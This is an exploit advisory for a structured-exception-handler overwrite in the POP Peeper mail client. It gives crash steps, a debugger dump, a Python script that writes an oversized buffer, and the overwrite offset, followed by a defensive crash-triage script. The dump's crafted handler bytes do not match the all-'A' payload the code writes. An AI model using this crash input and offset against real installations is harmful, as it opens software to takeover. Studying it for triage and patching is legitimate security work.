'''
********************************************************************************************
# Exploit Title: POP Peeper SEH Over-write.
# Date: 9/14/2015
# Exploit Author: Un_N0n
# Software Link: http://www.esumsoft.com/download
# Version: v4.0.1
# Tested on: Windows 7 x86(32 BIT)
********************************************************************************************

[DUMP:]

EAX 00000000
ECX 20203029
EDX 77C5660D ntdll.77C5660D
EBX 00000000
ESP 0012EC5C
EBP 0012EC7C
ESI 00000000
EDI 00000000
EIP 20203029
==============================
STACK:
0012FBF4 41414141
0012FBF8 41414141
0012FBFC 41414141
0012FC00 41414141
0012FC04 41414141
0012FC08 909020EB Pointer to next SE>
0012FC0C 20203029 SE handler
0012FC10 43434343
0012FC14 43434343
0012FC18 43434343
0012FC1C 43434343
0012FC20 43434343
0012FC24 43434343
0012FC28 43434343
===============================

[Steps to Produce the Crash]:
1- Open 'POPPeeper.exe'
2- Go to Accounts->Add->CreateSingleAccount.
3- After entering the email address, the option for Account name will appear, enter the contents of crash.txt in it->Save.
4- Then compose a new mail->In TO field and Subject field, enter the contents of crash.txt
5- Save as Draft, software will crash.
6- Open up "POPPeeper.exe" again.
7- Click on Check Mail option, Software will crash.
Every time you click on Check mail, it will crash as it will load the saved DRAFT.

[Code to produce CRASH.txt]
'''

# Write 66666 "A" characters to crash.txt, the input entered in the steps above.
buffer = "A" * 66666
file = "crash.txt"

with open(file, 'w') as f:
    f.write(buffer)

'''
[Extra Info:]

Offset : 2052
**********************************************************************************************
'''
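
Added example, not part of the original advisory: a small crash-triage script that parses the register and stack values from the [DUMP:] section and checks for the signs of an overwritten SEH record that the dump shows. The function names and the three heuristics are this example's own assumptions, and the embedded sample is the dump trimmed to the rows around the record.

```python
import re

# Values copied from the [DUMP:] section of the advisory; stack rows trimmed to the
# SEH record and its neighbours.
DUMP = """\
EAX 00000000
ECX 20203029
EIP 20203029
0012FC04 41414141
0012FC08 909020EB Pointer to next SE>
0012FC0C 20203029 SE handler
0012FC10 43434343
"""

REG = re.compile(r"^(E[A-Z]{2})\s+([0-9A-F]{8})\b")
ROW = re.compile(r"^([0-9A-F]{8})\s+([0-9A-F]{8})\s*(.*)$")

def parse_dump(text):
    """Split a debugger dump into registers and stack rows (addr, value, note)."""
    regs, rows = {}, []
    for line in text.splitlines():
        line = line.strip()
        if m := REG.match(line):
            regs[m.group(1)] = int(m.group(2), 16)
        elif m := ROW.match(line):
            rows.append((int(m.group(1), 16), int(m.group(2), 16), m.group(3).strip()))
    return regs, rows

def is_filler(value):
    """True when all four bytes of the dword are identical (e.g. 0x41414141)."""
    return len(set(value.to_bytes(4, "little"))) == 1

def triage_seh(regs, rows):
    """Heuristic checks (this example's own) that an SEH record was overwritten."""
    idx = next(i for i, r in enumerate(rows) if r[2] == "SE handler")
    handler = rows[idx][1]
    raw = handler.to_bytes(4, "little")
    before = rows[idx - 2][1] if idx >= 2 else None          # word before the record
    after = rows[idx + 1][1] if idx + 1 < len(rows) else None  # word after the record
    return {
        "eip_is_handler": regs.get("EIP") == handler,
        "handler_is_printable_ascii": all(0x20 <= b <= 0x7E for b in raw),
        "record_inside_filler": None not in (before, after) and is_filler(before) and is_filler(after),
        "handler_text": raw.decode("ascii", "replace"),
    }

if __name__ == "__main__":
    for check, result in triage_seh(*parse_dump(DUMP)).items():
        print(f"{check}: {result!r}")
```

All three checks are true for this dump: EIP equals the SE handler value, that value is four printable text bytes rather than a module address, and the record sits between runs of repeated input bytes.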